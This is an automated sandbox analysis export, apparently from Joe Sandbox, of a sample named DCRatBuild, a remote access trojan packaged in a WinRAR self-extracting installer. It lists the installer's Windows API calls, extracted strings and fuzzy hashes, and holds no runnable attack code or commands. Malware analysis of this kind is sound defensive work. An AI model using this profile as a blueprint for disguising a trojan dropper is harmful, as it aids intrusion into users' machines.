                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 004AE009
                                                                                                                        • _swprintf.LIBCMT ref: 004AE048
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 004AE05A
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004AE061
                                                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 004AE078
                                                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 004AE0C9
                                                                                                                        • Sleep.KERNEL32(?), ref: 004AE0F7
                                                                                                                        • DeleteObject.GDI32 ref: 004AE130
                                                                                                                        • DeleteObject.GDI32(?), ref: 004AE140
                                                                                                                        • CloseHandle.KERNEL32 ref: 004AE183
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzN
                                                                                                                        • API String ID: 3049964643-3307994349
                                                                                                                        • Opcode ID: f7e0d895a9b6312f7fc791d2f9e64b54c28e8d37396878563089620dd243c997
                                                                                                                        • Instruction ID: 41262eb7433939d0a65362ddbf9a7a70adb621f19a0e63c28359699916aae233
                                                                                                                        • Opcode Fuzzy Hash: f7e0d895a9b6312f7fc791d2f9e64b54c28e8d37396878563089620dd243c997
                                                                                                                        • Instruction Fuzzy Hash: 1E611671904240AFD320AF66DC49F6B37ACAB66309F04043FF946962A2DB7C9D44C76E

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,004AB73D,00000066), ref: 004AA6D5
                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA6EC
                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA703
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,?,004AB73D,00000066), ref: 004AA712
                                                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004AB73D,00000066), ref: 004AA72D
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004AA73E
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004AA762
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004AA7C6
                                                                                                                          • Part of subcall function 004AA626: GdipAlloc.GDIPLUS(00000010), ref: 004AA62C
                                                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004AA7A7
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004AA7CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                        • String ID: FjunJ$PNG
                                                                                                                        • API String ID: 211097158-2828676503
                                                                                                                        • Opcode ID: 084f5d045e1518a819975f5574e4e8114b8582669a1a683beb9535abefbcec80
                                                                                                                        • Instruction ID: ac60e3a49dcb7da32ba8bb91fda03df1f043003ebbbc9b7794dd3363489df778
                                                                                                                        • Opcode Fuzzy Hash: 084f5d045e1518a819975f5574e4e8114b8582669a1a683beb9535abefbcec80
                                                                                                                        • Instruction Fuzzy Hash: 3F319379600302AFD7119F21DC48D2B7BB9EF96751B04452AF80582660EF35DD54CA69

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6C4
                                                                                                                          • Part of subcall function 0049BB03: _wcslen.LIBCMT ref: 0049BB27
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6F2
                                                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6FE
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A728
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,0049A592,000000FF,?,?), ref: 0049A734
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 42610566-0
                                                                                                                        • Opcode ID: 97144dc7c5fbd569374e032b4c57b1475a4fbf33abffad3041330b32677d9e6d
                                                                                                                        • Instruction ID: b10e8e72478c1b5478d1b861f32be11ac0a8a7bd7ebb7403a1fc9f492259510f
                                                                                                                        • Opcode Fuzzy Hash: 97144dc7c5fbd569374e032b4c57b1475a4fbf33abffad3041330b32677d9e6d
                                                                                                                        • Instruction Fuzzy Hash: 6241A772900515ABCB15DF64CC89AEAB7B8FB48354F1441A7F95DE3200D738AE90CF95
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002,00000000), ref: 004B7E0F
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,004B7DC4,00000000,004CC300,0000000C,004B7F1B,00000000,00000002,00000000), ref: 004B7E16
                                                                                                                        • ExitProcess.KERNEL32 ref: 004B7E28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: 49bef1f45535c8711bf18bbfd4d8705a78b5ef027d38bd336f260dbeb3c0f1f1
                                                                                                                        • Instruction ID: fd247f7b54c16e5ddfd92b881f0001301a69e172c6fd42fd5437068c63f13751
                                                                                                                        • Opcode Fuzzy Hash: 49bef1f45535c8711bf18bbfd4d8705a78b5ef027d38bd336f260dbeb3c0f1f1
                                                                                                                        • Instruction Fuzzy Hash: C5E04F31000144AFCF417F12CD09D8A3F69EF50386B008465F8058A232CB39DE51CBA8
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 732d9bfe0a19b3c125e9109ffb77b61b605d899a1e8e1fe5d83853cff23454dd
                                                                                                                        • Instruction ID: 237a413ba954985918b764fd2bfe778fcd487b7c760648e7d913bce577fa31c4
                                                                                                                        • Opcode Fuzzy Hash: 732d9bfe0a19b3c125e9109ffb77b61b605d899a1e8e1fe5d83853cff23454dd
                                                                                                                        • Instruction Fuzzy Hash: 9E820A70904145AEDF15DF68C891BFBBF79AF06304F0841BFE8499B242DB395A88C769
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004AB7E5
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004AB8D1
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB8EF
                                                                                                                        • IsDialogMessageW.USER32(?,?), ref: 004AB902
                                                                                                                        • TranslateMessage.USER32(?), ref: 004AB910
                                                                                                                        • DispatchMessageW.USER32(?), ref: 004AB91A
                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 004AB93D
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 004AB960
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 004AB983
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004AB99E
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,004C35F4), ref: 004AB9B1
                                                                                                                          • Part of subcall function 004AD453: _wcschr.LIBVCRUNTIME ref: 004AD45C
                                                                                                                          • Part of subcall function 004AD453: _wcslen.LIBCMT ref: 004AD47D
                                                                                                                        • SetFocus.USER32(00000000), ref: 004AB9B8
                                                                                                                        • _swprintf.LIBCMT ref: 004ABA24
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                          • Part of subcall function 004AD4D4: GetDlgItem.USER32(00000068,004EFCB8), ref: 004AD4E8
                                                                                                                          • Part of subcall function 004AD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,004AAF07,00000001,?,?,004AB7B9,004C506C,004EFCB8,004EFCB8,00001000,00000000,00000000), ref: 004AD510
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004AD51B
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,004C35F4), ref: 004AD529
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD53F
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004AD559
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD59D
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004AD5AB
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004AD5BA
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004AD5E1
                                                                                                                          • Part of subcall function 004AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,004C43F4), ref: 004AD5F0
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 004ABA68
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 004ABA90
                                                                                                                        • GetTickCount.KERNEL32 ref: 004ABAAE
                                                                                                                        • _swprintf.LIBCMT ref: 004ABAC2
                                                                                                                        • GetLastError.KERNEL32(?,00000011), ref: 004ABAF4
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 004ABB43
                                                                                                                        • _swprintf.LIBCMT ref: 004ABB7C
                                                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 004ABBD0
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 004ABBEA
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 004ABC47
                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 004ABC6F
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 004ABCB9
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 004ABCE2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004ABCEB
                                                                                                                        • _swprintf.LIBCMT ref: 004ABD1E
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004ABD7D
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,004C35F4), ref: 004ABD94
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 004ABD9D
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004ABDAC
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004ABDBB
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004ABE68
                                                                                                                        • _wcslen.LIBCMT ref: 004ABEBE
                                                                                                                        • _swprintf.LIBCMT ref: 004ABEE8
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004ABF32
                                                                                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 004ABF4C
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 004ABF55
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 004ABF6B
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 004ABF85
                                                                                                                        • SetWindowTextW.USER32(00000000,004DA472), ref: 004ABFA7
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 004AC007
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004AC01A
                                                                                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 004AC0BD
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004AC197
                                                                                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 004AC1D9
                                                                                                                          • Part of subcall function 004AC73F: __EH_prolog.LIBCMT ref: 004AC744
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004AC1FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<J$STARTDLG$^J$__tmp_rar_sfx_access_check_%u$hJ$winrarsfxmappingfile.tmp$QL
                                                                                                                        • API String ID: 3829768659-2687651133
                                                                                                                        • Opcode ID: 669df2afd533cf8ff9fb3f9e34a71373b6ae00c1162b62bc13344d082647c0ab
                                                                                                                        • Instruction ID: c469496e93bde728ef1985a306cd70b458849851e4aa5b6abf001e837f0629e2
                                                                                                                        • Opcode Fuzzy Hash: 669df2afd533cf8ff9fb3f9e34a71373b6ae00c1162b62bc13344d082647c0ab
                                                                                                                        • Instruction Fuzzy Hash: CF42F571944244BEEB21AF619C8AFBF3B6CAB22704F14406BF540A61D2CB7D5E44CB6D

                                                                                                                        Control-flow Graph (function starting at 4a0863; legend: Executed / Not Executed; graph rendering not reproduced in text)
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 004A087C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004A088E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004A08BF
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004A0B69
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A0B83
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004A0B93
                                                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<L,00000000), ref: 004A0BB1
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004A0C09
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004A0C1E
                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<L,?,00000000,?,00000800), ref: 004A0C72
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,|<L,00000800,?,00000000,?,00000800), ref: 004A0C9C
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,D=L,00000800), ref: 004A0CD8
                                                                                                                          • Part of subcall function 004A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
                                                                                                                          • Part of subcall function 004A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
                                                                                                                        • _swprintf.LIBCMT ref: 004A0D4A
                                                                                                                        • _swprintf.LIBCMT ref: 004A0D96
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • AllocConsole.KERNEL32 ref: 004A0D9E
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004A0DA8
                                                                                                                        • AttachConsole.KERNEL32(00000000), ref: 004A0DAF
                                                                                                                        • _wcslen.LIBCMT ref: 004A0DC4
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004A0DD5
                                                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 004A0DDC
                                                                                                                        • Sleep.KERNEL32(00002710), ref: 004A0DE7
                                                                                                                        • FreeConsole.KERNEL32 ref: 004A0DED
                                                                                                                        • ExitProcess.KERNEL32 ref: 004A0DF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                        • String ID: (=L$,<L$,@L$0?L$0AL$4BL$8>L$D=L$DXGIDebug.dll$H?L$H@L$HAL$P>L$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=L$`@L$d?L$dAL$dwmapi.dll$h=L$h>L$kernel32$uxtheme.dll$|<L$|?L$|@L$<L$>L$?L$@L$AL
                                                                                                                        • API String ID: 1207345701-3345128522
                                                                                                                        • Opcode ID: 7278e89132d0fe35c80dc9fa115fa70691f2838945cc1edb93751fca4b31dccb
                                                                                                                        • Instruction ID: b4deb22b057566e1f9b3518e4adcd1cffcb7f9659c1c319daf7828fbfb34edda
                                                                                                                        • Opcode Fuzzy Hash: 7278e89132d0fe35c80dc9fa115fa70691f2838945cc1edb93751fca4b31dccb
                                                                                                                        • Instruction Fuzzy Hash: E5D174B5008344ABD7B09F51C949FDFBAE8BB95709F50C91FF18596240CB788648CB6E

                                                                                                                        Control-flow Graph (function at 004AC73F; the interactive graph, with its executed and not-executed basic blocks, is not reproduced in this text export)
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 004AC744
                                                                                                                          • Part of subcall function 004AB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004AB3FB
                                                                                                                          • Part of subcall function 004AAF98: _wcschr.LIBVCRUNTIME ref: 004AB033
                                                                                                                        • _wcslen.LIBCMT ref: 004ACA0A
                                                                                                                        • _wcslen.LIBCMT ref: 004ACA13
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004ACA71
                                                                                                                        • _wcslen.LIBCMT ref: 004ACAB3
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 004ACBFB
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 004ACC36
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 004ACC46
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,004DA472), ref: 004ACC54
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004ACC7F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                        • String ID: %s.%d.tmp$<br>$<J$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$J
                                                                                                                        • API String ID: 986293930-1283477974
                                                                                                                        • Opcode ID: 65238eedfd0192561582b5374b298c59588fc2d33f02b562922f3887847ba03f
                                                                                                                        • Instruction ID: 9a89d4cca27bea56c37f4ee61a2779d48046e7957f1886f3242f345778553a2d
                                                                                                                        • Opcode Fuzzy Hash: 65238eedfd0192561582b5374b298c59588fc2d33f02b562922f3887847ba03f
                                                                                                                        • Instruction Fuzzy Hash: B5E185B2900118AADF24DBA1DD85EEF73BCAB15314F1044ABF946E7140EF789E448F68
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0049DA70
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0049DA91
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0049DAAC
                                                                                                                          • Part of subcall function 0049C29A: _wcslen.LIBCMT ref: 0049C2A2
                                                                                                                          • Part of subcall function 004A05DA: _wcslen.LIBCMT ref: 004A05E0
                                                                                                                          • Part of subcall function 004A1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0049BAE9,00000000,?,?,?,00010422), ref: 004A1BA0
                                                                                                                        • _wcslen.LIBCMT ref: 0049DDE9
                                                                                                                        • __fprintf_l.LIBCMT ref: 0049DF1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9L
                                                                                                                        • API String ID: 557298264-3287507373
